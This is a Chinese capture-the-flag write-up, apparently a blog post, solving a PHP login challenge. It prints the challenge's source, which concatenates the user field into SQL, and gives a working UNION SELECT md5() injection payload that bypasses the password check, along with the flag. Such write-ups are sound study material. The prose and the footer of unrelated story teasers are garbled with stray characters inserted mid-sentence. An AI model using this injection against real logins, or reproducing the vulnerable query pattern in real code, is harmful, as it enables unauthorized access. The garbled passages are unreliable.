實(shí)驗(yàn)吧-程序邏輯問(wèn)題

程序邏輯問(wèn)題

原題鏈接

分析

查看源碼有個(gè)index.txt

<?php


if($_POST[user] && $_POST[pass]) {
    $conn = mysql_connect("********, "*****", "********");
    mysql_select_db("phpformysql") or die("Could not select database");
    if ($conn->connect_error) {
        die("Connection failed: " . mysql_error($conn));
} 
$user = $_POST[user];
$pass = md5($_POST[pass]);

$sql = "select pw from php where user='$user'";
$query = mysql_query($sql);
if (!$query) {
    printf("Error: %s\n", mysql_error($conn));
    exit();
}
$row = mysql_fetch_array($query, MYSQL_ASSOC);
//echo $row["pw"];
  
  if (($row[pw]) && (!strcasecmp($pass, $row[pw]))) {
//strcasecmp — 二進(jìn)制安全比較字符串(不區(qū)分大小寫)
//和strcmp不同,這里沒(méi)法通過(guò)php弱類型繞過(guò)
    echo "<p>Logged in! Key:************** </p>";
}
else {
    echo("<p>Log in failure!</p>");
    
  }

上面這段代碼的邏輯是這樣的:

  1. 獲取user的那一行數(shù)據(jù)。
  2. 把user哪一行數(shù)據(jù)的pw列,md5運(yùn)算后,與提交的pass數(shù)據(jù)做比較尉咕,相等就輸出flag。

這里提交的pass璃岳,我們可控年缎,只要能查出一個(gè)pw就行,無(wú)所謂是誰(shuí)的pw

就是說(shuō)user其實(shí)無(wú)所謂是哪個(gè)铃慷,無(wú)所謂知不知道单芜,只要利用user提交sql注入語(yǔ)句查到一個(gè)md5(pw)
且于提交的md5(pass)相等就行。

可以本地做個(gè)測(cè)試枚冗,更清楚的說(shuō)明這個(gè)問(wèn)題:

mysql> select * from user;
+----------+-----+------------+
| Username | Age | Password   |
+----------+-----+------------+
| olivia   |  18 | slimslim   |
| qingchen |  18 | meimima123 |
| hack     |   1 | love_pwn   |
| someome  |   3 | p@55w0rd   |
+----------+-----+------------+
4 rows in set (0.00 sec)

mysql> select password from user where username='hack' union select md5(1);
+----------------------------------+
| password                         |
+----------------------------------+
| love_pwn                         |
| c4ca4238a0b923820dcc509a6f75849b |
+----------------------------------+
2 rows in set (0.00 sec)

mysql> select password from user where username='xman' union select md5(1);
+----------------------------------+
| password                         |
+----------------------------------+
| c4ca4238a0b923820dcc509a6f75849b |
+----------------------------------+
1 row in set (0.00 sec)

于是有了payload:

user=wobuxiwnagyouzhegeren' union select md5(123)#&pass=123

結(jié)果:
Logged in! Key: SimCTF{youhaocongming}

flag

SimCTF{youhaocongming}

知識(shí)點(diǎn)

代碼審計(jì)
sql注入

?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請(qǐng)聯(lián)系作者
  • 人面猴
    序言:七十年代末缓溅,一起剝皮案震驚了整個(gè)濱河市蛇损,隨后出現(xiàn)的幾起案子赁温,更是在濱河造成了極大的恐慌,老刑警劉巖淤齐,帶你破解...
    沈念sama閱讀 222,627評(píng)論 6 517
  • 死咒
    序言:濱河連續(xù)發(fā)生了三起死亡事件股囊,死亡現(xiàn)場(chǎng)離奇詭異,居然都是意外死亡更啄,警方通過(guò)查閱死者的電腦和手機(jī)稚疹,發(fā)現(xiàn)死者居然都...
    沈念sama閱讀 95,180評(píng)論 3 399
  • 救了他兩次的神仙讓他今天三更去死
    文/潘曉璐 我一進(jìn)店門,熙熙樓的掌柜王于貴愁眉苦臉地迎上來(lái)祭务,“玉大人内狗,你說(shuō)我怎么就攤上這事怪嫌。” “怎么了柳沙?”我有些...
    開(kāi)封第一講書人閱讀 169,346評(píng)論 0 362
  • 道士緝兇錄:失蹤的賣姜人
    文/不壞的土叔 我叫張陵岩灭,是天一觀的道長(zhǎng)。 經(jīng)常有香客問(wèn)我赂鲤,道長(zhǎng)噪径,這世上最難降的妖魔是什么? 我笑而不...
    開(kāi)封第一講書人閱讀 60,097評(píng)論 1 300
  • ?港島之戀(遺憾婚禮)
    正文 為了忘掉前任数初,我火速辦了婚禮找爱,結(jié)果婚禮上,老公的妹妹穿的比我還像新娘泡孩。我一直安慰自己车摄,他們只是感情好,可當(dāng)我...
    茶點(diǎn)故事閱讀 69,100評(píng)論 6 398
  • 惡毒庶女頂嫁案:這布局不是一般人想出來(lái)的
    文/花漫 我一把揭開(kāi)白布珍德。 她就那樣靜靜地躺著练般,像睡著了一般。 火紅的嫁衣襯著肌膚如雪锈候。 梳的紋絲不亂的頭發(fā)上薄料,一...
    開(kāi)封第一講書人閱讀 52,696評(píng)論 1 312
  • 城市分裂傳說(shuō)
    那天,我揣著相機(jī)與錄音泵琳,去河邊找鬼摄职。 笑死,一個(gè)胖子當(dāng)著我的面吹牛获列,可吹牛的內(nèi)容都是我干的谷市。 我是一名探鬼主播,決...
    沈念sama閱讀 41,165評(píng)論 3 422
  • 雙鴛鴦連環(huán)套:你想象不到人心有多黑
    文/蒼蘭香墨 我猛地睜開(kāi)眼击孩,長(zhǎng)吁一口氣:“原來(lái)是場(chǎng)噩夢(mèng)啊……” “哼迫悠!你這毒婦竟也來(lái)了?” 一聲冷哼從身側(cè)響起巩梢,我...
    開(kāi)封第一講書人閱讀 40,108評(píng)論 0 277
  • 萬(wàn)榮殺人案實(shí)錄
    序言:老撾萬(wàn)榮一對(duì)情侶失蹤创泄,失蹤者是張志新(化名)和其女友劉穎,沒(méi)想到半個(gè)月后括蝠,有當(dāng)?shù)厝嗽跇?shù)林里發(fā)現(xiàn)了一具尸體鞠抑,經(jīng)...
    沈念sama閱讀 46,646評(píng)論 1 319
  • ?護(hù)林員之死
    正文 獨(dú)居荒郊野嶺守林人離奇死亡,尸身上長(zhǎng)有42處帶血的膿包…… 初始之章·張勛 以下內(nèi)容為張勛視角 年9月15日...
    茶點(diǎn)故事閱讀 38,709評(píng)論 3 342
  • ?白月光啟示錄
    正文 我和宋清朗相戀三年忌警,在試婚紗的時(shí)候發(fā)現(xiàn)自己被綠了搁拙。 大學(xué)時(shí)的朋友給我發(fā)了我未婚夫和他白月光在一起吃飯的照片。...
    茶點(diǎn)故事閱讀 40,861評(píng)論 1 353
  • 活死人
    序言:一個(gè)原本活蹦亂跳的男人離奇死亡,死狀恐怖箕速,靈堂內(nèi)的尸體忽然破棺而出酪碘,到底是詐尸還是另有隱情,我是刑警寧澤盐茎,帶...
    沈念sama閱讀 36,527評(píng)論 5 351
  • ?日本核電站爆炸內(nèi)幕
    正文 年R本政府宣布婆跑,位于F島的核電站,受9級(jí)特大地震影響庭呜,放射性物質(zhì)發(fā)生泄漏滑进。R本人自食惡果不足惜,卻給世界環(huán)境...
    茶點(diǎn)故事閱讀 42,196評(píng)論 3 336
  • 男人毒藥:我在死后第九天來(lái)索命
    文/蒙蒙 一募谎、第九天 我趴在偏房一處隱蔽的房頂上張望扶关。 院中可真熱鬧,春花似錦数冬、人聲如沸节槐。這莊子的主人今日做“春日...
    開(kāi)封第一講書人閱讀 32,698評(píng)論 0 25
  • 一樁弒父案拐纱,背后竟有這般陰謀
    文/蒼蘭香墨 我抬頭看了看天上的太陽(yáng)铜异。三九已至,卻和暖如春秸架,著一層夾襖步出監(jiān)牢的瞬間揍庄,已是汗流浹背。 一陣腳步聲響...
    開(kāi)封第一講書人閱讀 33,804評(píng)論 1 274
  • 情欲美人皮
    我被黑心中介騙來(lái)泰國(guó)打工东抹, 沒(méi)想到剛下飛機(jī)就差點(diǎn)兒被人妖公主榨干…… 1. 我叫王不留蚂子,地道東北人。 一個(gè)月前我還...
    沈念sama閱讀 49,287評(píng)論 3 379
  • 代替公主和親
    正文 我出身青樓缭黔,卻偏偏與公主長(zhǎng)得像食茎,于是被迫代替她去往敵國(guó)和親。 傳聞我的和親對(duì)象是個(gè)殘疾皇子馏谨,可洞房花燭夜當(dāng)晚...
    茶點(diǎn)故事閱讀 45,860評(píng)論 2 361

推薦閱讀更多精彩內(nèi)容

  • 2018/3/16 17:34:51 WEB題 1.簽到題 題目:key在哪里别渔? writeup:查看源代碼即可獲...
    Sec小玖閱讀 22,401評(píng)論 1 11
  • SQL注入是CTF的WEB方向必不可少的一種題型,斗哥最近也做了一些在線題目惧互,其中最常見(jiàn)的題目就是給出一個(gè)登錄界面...
    漏斗社區(qū)閱讀 22,876評(píng)論 0 7
  • 簽到2 地址:來(lái)源:網(wǎng)絡(luò)攻防大賽 說(shuō)了輸入zhimakaimen哎媚,開(kāi)始輸入沒(méi)認(rèn)真看,只能輸入10個(gè)數(shù)字壹哺,可是zhi...
    JasonChiu17閱讀 4,760評(píng)論 0 9
  • WEB 1抄伍、簽到題 進(jìn)入網(wǎng)頁(yè)之后只有一行字”key在哪里艘刚?”管宵,直接右鍵,查看網(wǎng)頁(yè)源代碼, nctf{flag_ad...
    windbsy閱讀 7,525評(píng)論 0 1
  • 今天的作業(yè)是: (1)熟悉兩個(gè)重要概念:圖式箩朴、情結(jié)岗喉;(2)舉例說(shuō)明“一句話這樣說(shuō)要遠(yuǎn)比那樣說(shuō)更有味道,語(yǔ)言的...
    魔法藥水閱讀 435評(píng)論 1 6